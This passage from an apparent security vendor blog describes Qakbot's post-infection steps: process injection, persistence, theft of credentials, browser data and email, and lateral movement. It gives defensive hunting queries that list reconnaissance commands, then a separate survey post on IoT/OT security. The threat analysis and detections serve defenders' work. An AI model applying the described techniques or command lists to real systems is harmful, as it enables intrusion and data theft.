In most cases, the downloaded file is a Portable Executable (PE) file renamed with either an .htm or .dat file extension, in order to bypass web filtering systems that prevent certain file types. Depending on the specific campaign, the naming of these files varies greatly. For example, a recent campaign using .htm files named them with simple letters and numbers, such as goh[1].htm or j[1].htm. However, a separate campaign that used an invoice theme and used .dat files named them with an extremely long string of numbers, such as 44494.4409064815[1].dat. Again, these differences from campaign to campaign highlight that Qakbot is used simultaneously by different threat actors, which can make concurrent campaigns of the same malware look strikingly different.

Once this file is downloaded onto the device, the file is promptly renamed to a different file name with a nonexistent file name extension. Some examples include test.test and good.good (derived from .htm files), or GiCelod.waGic and Celod.wac (derived from .dat files). In many of the incidents involving .htm files, a folder called C:\Datop is created, and the files are saved in that location. Meanwhile, the incidents with .dat files are saved in the C:\Users\AppData\Local\Temp location.

Process injection for discovery

Whichever file the user ends up with is loaded using regsvr32.exe, which injects into a legitimate process. Both MSRA.exe and Mobsync.exe have been used for this process injection behavior in recent Qakbot-related campaigns.

The injected process is then used for a series of discovery commands, including the following:

Screenshot of commands executed via LOLBins

Scheduled tasks

The injected process from the previous building block then creates a .dll file with a randomly generated name. This DLL is used to query existing scheduled tasks for a specific ID, and if that scheduled task does not already exist, the DLL creates the task. The scheduled task is to run a predefined task as a means of persistence, as outlined in the following command line:

Screenshot of command to start a task
This scheduled task is created with the /F flag, which is used to suppress warnings if the specified task already exists, even though the malware has already queried for a specific scheduled task.

Credential and browser data theft

Qakbot attempts to steal credentials from multiple locations. First, the injected MSRA.exe or Mobsync.exe process loads the Vault Credential Library file to enumerate credentials. Additionally, this process injects into ping.exe and attempts to read credentials from CredMan using the passport.net\* parameter.

Qakbot also targets browser data. The injected process launches the esentutl.exe process. Browser data, including cookies and browser history, are recovered from the web cache using the following commands:

Screenshot of command for getting browser data via esentutl.exe
These commands specifically look for log files, system files, and database files (/l, /s, and /d).

Email exfiltration

As mentioned in a previous section, many of the emails delivering Qakbot use the fake-reply technique. To do this, Qakbot is also designed to exfiltrate emails from affected devices.

To exfiltrate emails, the injected process launches into the ping.exe process and launches a command to ping localhost:

Screenshot of code for pinging local host

From there, ping.exe is used to copy dozens of email message files and save them in an “Email Storage” folder. These email messages are saved with sequential naming schema, starting with 1.eml and increasing by one for as many email messages as the attacker copies. We have identified instances where the attacker copied out over 100 message files from a single device.

Once the copied email files are exfiltrated, the evidence of the action is deleted by removing the “Email Storage” folder using the rmdir command.

Additional payloads, lateral movement, and ransomware

As is the case with many malware variants today, getting Qakbot onto a device is frequently just the first step in what ends up being a larger attack. Attackers can use the access from Qakbot infections to deliver additional payloads or sell access to other threat actors who can use the purchased access for their objectives.

In many cases, attackers will expand the scope of their attack by using credentials obtained in earlier stages of the attack to move laterally throughout the network. In several instances, attackers would move laterally using Windows Management Instrumentation (WMI) and drop a malicious DLL on the newly accessed device. From there, the attacker will run the same series of discovery commands as they did on the initial access device and will conduct further credential theft.

In other instances, other malicious files are dropped in conjunction with the malicious DLL. For example, several BAT files that were specifically designed to turn off security tools on the affected device were dropped before dropping the malicious DLL. These slight differences in the attack chain are evidence of multiple actors using Qakbot for lateral movement.

In addition to lateral movement, attackers frequently drop additional payloads on affected devices, especially Cobalt Strike. Qakbot has a Cobalt Strike module, and actors who purchase access to machines with prior Qakbot infections may also drop their own Cobalt Strike beacons and additional payloads. Using Cobalt Strike lets attackers have full hands-on-keyboard access to the affected devices, enabling them to perform additional discovery, find high-value targets on the network, move laterally, and drop additional payloads, especially human-operated ransomware variants such as Conti and Egregor.

Resurging and evolving threats require coordinated threat defense

Qakbot’s continued prevalence in the threat landscape demands comprehensive protection capable of detecting and stopping this malware, its components, and other similar threats at every stage of the attack chain: email delivery, network activity, endpoint behavior, and follow-on attacker activities. Microsoft 365 Defender provides coordinated defense using multiple layers of dynamic protection technologies­—including machine learning-based protection—and correlating threat data from email, endpoints, identities, and cloud apps. It is also backed by a global network of threat experts who continuously monitor the threat landscape for new, resurging, and evolving attacker tools and techniques.

Microsoft Defender for Office 365 detects and blocks emails that attempt to deliver Qakbot. Safe Links and Safe Attachments provide real-time protection by leveraging a built-in sandbox that examines and detonates links and attachments in messages before they get delivered to target recipients. However, for those messages without such artifacts, Microsoft Defender SmartScreen in Microsoft Edge and other web browsers that support it blocks the malicious websites and prevents downloading the malicious Excel file on devices.

On endpoints, attack surface reduction rules detect and block common attack techniques used by Qakbot and subsequent threats that may result from its activities. Endpoint detection and response (EDR) capabilities detect malicious files, malicious behavior, and other related events before and after execution. Network protection also blocks subsequent attempts by Qakbot to connect to malicious domains and IP addresses, and Advanced hunting lets defenders create custom detections to proactively find this malware and other related threats.

Defenders can also do the following mitigation steps to reduce the impact of Qakbot in their organizations:

  • Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use Office 365 security for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Office 365 to recheck links on click.
  • Enable Zero-hour auto purge (ZAP) in Exchange Online, which is an email protection capability that retroactively detects and neutralizes malicious messages that have already been delivered in response to newly acquired threat intelligence.
  • Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Stop malicious XLM or VBA macros by ensuring runtime macro scanning by Windows Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to Enable for All Files or Enable for Low Trust Files.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
  • Turn on tamper protection features to prevent attackers from stopping security services.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Use device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.
  • Use multi-factor authentication (MFA) to mitigate credential theft and prevent attacker access. Keep MFA always-on for privileged accounts and apply risk-based MFA for normal accounts. Consider transitioning to a passwordless primary authentication method, such as Azure MFA, certificates, or Windows Hello for Business.
  • Run realistic, yet safe, simulated phishing and password attack campaigns in your organization using Attack Simulator for Microsoft Defender for Office 365. Run spear-phishing (credential harvest) simulations to train end users against clicking URLs in unsolicited messages and disclosing their credentials.
  • Educate end users about identifying lures in spear-phishing emails and watering hole attacks, protecting personal and business information in social media, and filtering unsolicited communication. Encourage users to report reconnaissance attempts and other suspicious activity.

Learn how you can stop attacks through automated, cross-domain security with Microsoft 365 Defender.

 

Microsoft 365 Defender Threat Intelligence Team

 

Appendix

Microsoft researchers published the following threat analytics reports, which are available to Microsoft 365 Defender customers through the Microsoft 365 security center:

These reports serve as a good starting point for organizations to understand these active attacks, determine if they are affected, and investigate related incidents and alerts. The reports provide and consolidate real-time data aggregated from across Microsoft 365 Defender, indicating the all-up impact of the threat to the organization.

The following sections provide the specific Microsoft 365 Defender detections that can help surface Qakbot and related threats.

Antivirus

Microsoft Defender Antivirus detects Qakbot installers as the following malware:

Qakbot downloader

Qakbot implant

Qakbot behavior

Additional detections based on activity group behavior

Due to Qakbot’s high likelihood of transitioning to human-operated attack behaviors including data exfiltration, lateral movement, and ransomware by multiple actors, the detections seen after infection can vary widely. During the activity described in this report, at least one major activity group was provided Qakbot access after initial infection, but other groups have been known to purchase access so any initial infection indicated by advanced hunting queries, behavior, or Qakbot infection should be fully investigated.

Endpoint detection and response (EDR)

Alerts with the following titles in the security center can indicate threat activity on your network related directly to the material in this report covering Qakbot initial infection and future human operated or ransomware activity:

  • Qakbot malware
  • Qakbot credential stealer
  • Qakbot download URL
  • Qakbot network infrastructure

Email security

Microsoft Defender for Office 365 offers enhanced solutions for blocking and identifying malicious emails. In the email entity page, administrators can get enhanced information on emails in a unified view. Administrators can view known campaigns impacting inboxes and investigate malicious emails by drilling down to view all attachments or URL detonation details from dynamic analysis.

The following dynamic detonation signature may indicate threat activity associated with Qakbot. By utilizing email Campaigns view, you can filter based on campaign subtype for the following signals. These signals, however, can be triggered by unrelated threat activity:

  • Downloader_Macro_Donoff_ZGA

Advanced hunting

The following Advanced Hunting Queries are accurate as of this writing. For the most up-to-date queries, visit aka.ms/QakbotAHQ.

To locate possible exploitation activity, run the following queries in Microsoft 365 Defender.

Craigslist impersonation domains lead to XLS download

Use this query to locate devices connecting to malicious domains registered to impersonate Craigslist.org. These domains act as redirectors which direct the target to a malicious XLS download.

DeviceNetworkEvents
| where RemoteUrl matches regex @"abuse\.[a-zA-Z]\d{2}-craigslist\.org"

Qakbot-favored process execution after anomalous Excel spawning

Use this query to find Excel launching anomalous processes congruent with Qakbot payloads which contain additional markers from recent Qakbot executions. The presence of such anomalous processes indicate that the payload was delivered and executed, though reconnaissance and successful implantation hasn’t been completed yet.

DeviceProcessEvents
| where InitiatingProcessParentFileName has "excel.exe" or InitiatingProcessFileName =~ "excel.exe"
| where InitiatingProcessFileName in~ ("excel.exe","regsvr32.exe")
| where FileName in~ ("regsvr32.exe", "rundll32.exe")
| where ProcessCommandLine has @"..\"

Qakbot reconnaissance activities

Use this query to find reconnaissance and beaconing activities after code injection occurs. Reconnaissance commands are consistent with the current version of Qakbot and occur automatically to exfiltrate system information. This data, once exfiltrated, will be used to prioritize human operated actions.

DeviceProcessEvents
| where InitiatingProcessFileName == InitiatingProcessCommandLine
| where ProcessCommandLine has_any (
"whoami /all","cmd /c set","arp -a","ipconfig /all","net view /all","nslookup -querytype=ALL -timeout=10",
"net share","route print","netstat -nao","net localgroup")
| summarize dcount(FileName), make_set(ProcessCommandLine) by DeviceId,bin(Timestamp, 1d), InitiatingProcessFileName, InitiatingProcessCommandLine
| where dcount_FileName >= 8

Qakbot email stealing by ping.exe

Use this query to find email stealing activities ran by Qakbot that will use “ping.exe -t 127.0.0.1” to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indicates that the malware completed a large portion of its automated activity without interruption.

DeviceFileEvents
| where InitiatingProcessFileName =~ 'ping.exe'
| where FileName endswith '.eml'

General attempts to access local email store

Use this query to find attempts to access files in the local path containing Outlook emails.

DeviceFileEvents
| where FolderPath hasprefix "EmailStorage"
| where FolderPath has "Outlook"
| project FileName, FolderPath, InitiatingProcessFileName,
InitiatingProcessCommandLine, DeviceId, Timestamp

Email collection for exfiltration

Use this query to find attempts to copy and store emails for later exfiltration.

DeviceFileEvents
| where InitiatingProcessFileName =~ 'ping.exe' and InitiatingProcessCommandLine == 'ping.exe -t 127.0.0.1'
and InitiatingProcessParentFileName in~('msra.exe', 'mobsync.exe') and FolderPath endswith ".eml"

 

 

The post A closer look at Qakbot’s latest building blocks (and how to knock them down) appeared first on Microsoft Security Blog.

New research shows IoT and OT innovation is critical to business but comes with significant risks

December 8th, 2021 No comments

The need for much improved IoT and operational technology (OT) cybersecurity became clearer this year with recent attacks on network devices,1 surveillance systems,2 an oil pipeline,3 and a water treatment facility,4 to name a few examples.

To better understand the challenges customers are facing, Microsoft partnered with the Ponemon Institute to produce empirical data to help us better understand the state of IoT and OT security from a customer’s perspective. With this data, we hope to better target our cybersecurity investments and to improve the efficacy within Microsoft Defender for IoT, and our other IoT-related products. Ponemon conducted the research by surveying 615 IT, IT security, and OT security practitioners across the United States.

To get an overview of the key findings from the 2021 The State of IoT and OT Cybersecurity in the Enterprise, download the full report.

IoT adoption is critical despite significant security challenges

The research showed that a large majority of respondents believe that IoT and OT adoption is critical to future business success. As a result, they are advancing IoT and OT projects as a key priority.

  • 68 percent of respondents say senior management believes IoT and OT are critical to supporting business innovation and other strategic goals.
  • 65 percent of respondents say senior management has made it a priority for IT and OT security practitioners to plan, develop, or deploy IoT and OT projects to advance business interests.

Within this group, only a small minority of organizations slowed, limited, or stopped IoT and OT projects even though a majority believe that generally these types of devices are not built with security in mind and that they represent one of the least secured aspects of their IT and OT infrastructure.

  • 31 percent of IT security practitioners have slowed, limited, or stopped the adoption of IoT and OT projects due to security concerns.
  • 55 percent of respondents do not believe IoT and OT devices have been designed with security in mind.
  • 60 percent of respondents say IoT and OT security is one of the least secured aspects of their IT and OT infrastructure.

Based on the data, it appears that business interests are currently taking priority over the increased security risks that organizations assume, as they advance their IoT and OT projects. This puts security and risk leaders in a difficult place and explains why IoT and cyber-physical systems security has become their top concern for the next three to five years.5

“We believe this unique research highlights the obstacles organizations face as they use IoT and OT to drive business innovation with technologies that are more easily compromised than traditional endpoints,” said Dr. Larry Ponemon, Chairman and Founder of Ponemon Institute. “On a positive note, a vast majority of security and risk leaders recognize the threat and have made shoring up their IoT and OT defenses a top priority for the next 12 to 24 months.”

Outdated IoT and OT assumptions are putting organizations at risk

In the past, there was a common assumption about IoT and OT devices that is no longer true. It was assumed that IoT and OT devices were typically segmented from traditional endpoints (workstations, servers, and mobile) or that they were deployed within separate air-gapped networks. The research confirmed that devices on IT and OT networks are frequently connected directly or indirectly to the internet, making them targets that can be breached from outside of the organization. The latest evolution to the Mozi attack1 is a great example of how a business network can be breached through network gear running on the edge of business networks.

  • 51 percent of OT networks are connected to corporate IT (business) networks, like SAP and remote access.
  • 88 percent of respondents say their enterprise IoT devices are connected to the internet—for instance, for cloud printing services.
  • 56 percent of respondents say devices on their OT network are connected to the internet for scenarios like remote access.

It’s critical that these dated assumptions are removed from organizational thinking so that proper mitigations can be put in place.

Key security challenges for IoT and OT devices

When it comes to securing IoT and OT devices, the top challenge is related to visibility. Per the research, only a small subset of respondents shared that they had a complete view of all their IoT and OT asset inventory.

  • 29 percent of respondents mentioned that their organizations have a complete inventory of IoT and OT devices. Among them, they have an average of 9,685 devices.

But visibility isn’t just about building a complete asset inventory. It’s also about gaining visibility into the security posture of each IoT and OT device. Questions like “Is the device optimally configured for security,” “Are there any known vulnerabilities in the device’s firmware,” “Is the device communicating or connected directly to the internet,” and “Is the device patched with the latest firmware build?” are some of the questions that organizations need answers to but struggle with for their IoT and OT devices.

  • 42 percent of respondents claimed they lack the ability to detect vulnerabilities on IoT and OT devices.
  • 64 percent of respondents have low or average confidence that IoT devices are patched and up to date.

Another dimension of visibility that customers are seeking solutions for is related to the ability for organizations to become aware of IoT and OT devices that are involved in attacks. Most of the survey respondents have low to average confidence that the tools they have deployed will be successful in detecting compromised devices.

  • 61 percent have low or average confidence in the ability to identify whether IoT devices are compromised.

Another important aspect of visibility worth mentioning is that customers struggle with the ability to efficiently determine how compromised IoT and OT devices are part of broader end-to-end incidents. To resolve attacks completely and decisively, organizations frequently use manual investigation processes to correlate and make sense of the end-to-end attack. Meanwhile, attackers use this time to broaden the attack and get closer to the end goal.

  • 47 percent of respondents say their organizations are primarily using manual processes to identify and correlate impacted IoT and OT devices.

IoT and OT attacks are not hypothetical

The Ponemon research shows us that a good percentage of the surveyed respondents are encountering IoT and OT attacks. Nearly 40 percent of respondents told us that they’ve experienced attacks where the IoT and OT devices were either the actual target of the attack (for example, to halt production using human-operated ransomware) or were used to conduct broader attacks (such as lateral movement, evade detection, and persist). Most respondents felt these types of attacks will increase in the years to come.

  • 39 percent of respondents experienced a cyber incident in the past two years where an IoT or OT device was the target of the attack.
  • 35 percent of respondents say in the past two years their organizations experienced a cyber incident where an IoT device was used by an attacker to conduct a broader attack.
  • 63 percent of respondents say the volume of attacks will significantly increase.

One thing to keep in mind with these last three statistics is that the study also showed that customers have low to average confidence in their ability to detect when IoT and OT devices have been compromised. Based on this, it’s likely that the real numbers are higher.

The new Microsoft Defender for IoT is available now for your feedback

Last month at Ignite, we announced that Microsoft Defender for IoT, formerly Azure Defender for IoT, is adding agentless monitoring capabilities to help secure enterprise IoT devices connected to IT networks such as Voice over Internet Protocol (VoIP), printers, and smart TVs. This complements the product’s existing support for industrial systems and critical infrastructure like ICS/SCADA. Additionally, we announced that Defender for IoT is part of the Microsoft SIEM and XDR offering bringing its AI, automation, and expertise to complex multistage attacks that involve IoT and OT devices.

An open investigation dashboard for P L C programming and related alerts.

Figure 1. Deep contextual telemetry (like asset and connection details) combined with threat intelligence (like analytics rules, SOAR playbooks, and dashboards) from Section 52 helps analysts perform high-efficiency incident responses.

Microsoft Security would now like to invite you to try out the new public preview of the integrated solution that addresses the challenges surfaced in the Ponemon research, such as complete asset inventory, vulnerability management, threat detection, and correlation. Try the public preview functionality within the Microsoft 365 Defender console or within the Microsoft Defender for IoT experiences. We look forward to hearing and integrating your feedback for the new Microsoft Defender for IoT.

More details on the public preview and roadmap can be viewed in our Ignite session.

Video with link to the Accelerate digital transformation by securing your Enterprise I o T devices with Microsoft Defender for I o T session with Nir Krumer, Principal P M Manager, and Chris Hallum, Senior Product Marketing Manager.

Figure 2. Nir Krumer, Principal Program Manager, and Chris Hallum, Senior Product Marketing Manager, discuss securing your Enterprise IoT devices with Microsoft Defender for IoT.

Learn more

More information on the current release of Microsoft Defender for IoT, which offers OT security, can be found in the following resources:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 


1This is why the Mozi botnet will linger on, Charlie Osborne, ZDNet. 1 September 2021.

2‘Thousands’ of Verkada Cameras Affected by Hacking Breach, IFSEC Global Staff, Dark Reading. 10 March 2021.

3Hackers Breached Colonial Pipeline Using Compromised Password, William Turton, Kartikay Mehrotra, Bloomberg. 4 June 2021.

4‘Dangerous Stuff’: Hackers Tried to Poison Water Supply of Florida Town, Frances Robles, Nicole Perlroth, New York Times. 8 February 2021.

5Develop a Security Strategy for Cyber-Physical Systems, Susan Moore, Gartner. 13 April 2021.

The post New research shows IoT and OT innovation is critical to business but comes with significant risks appeared first on Microsoft Security Blog.